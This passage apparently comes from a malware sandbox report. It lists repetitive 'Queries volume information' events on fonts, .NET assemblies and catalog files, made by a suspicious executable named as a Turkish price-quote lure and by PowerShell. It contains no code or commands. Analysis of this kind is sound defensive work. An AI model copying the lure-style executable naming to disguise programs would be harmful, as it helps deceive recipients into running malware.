Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
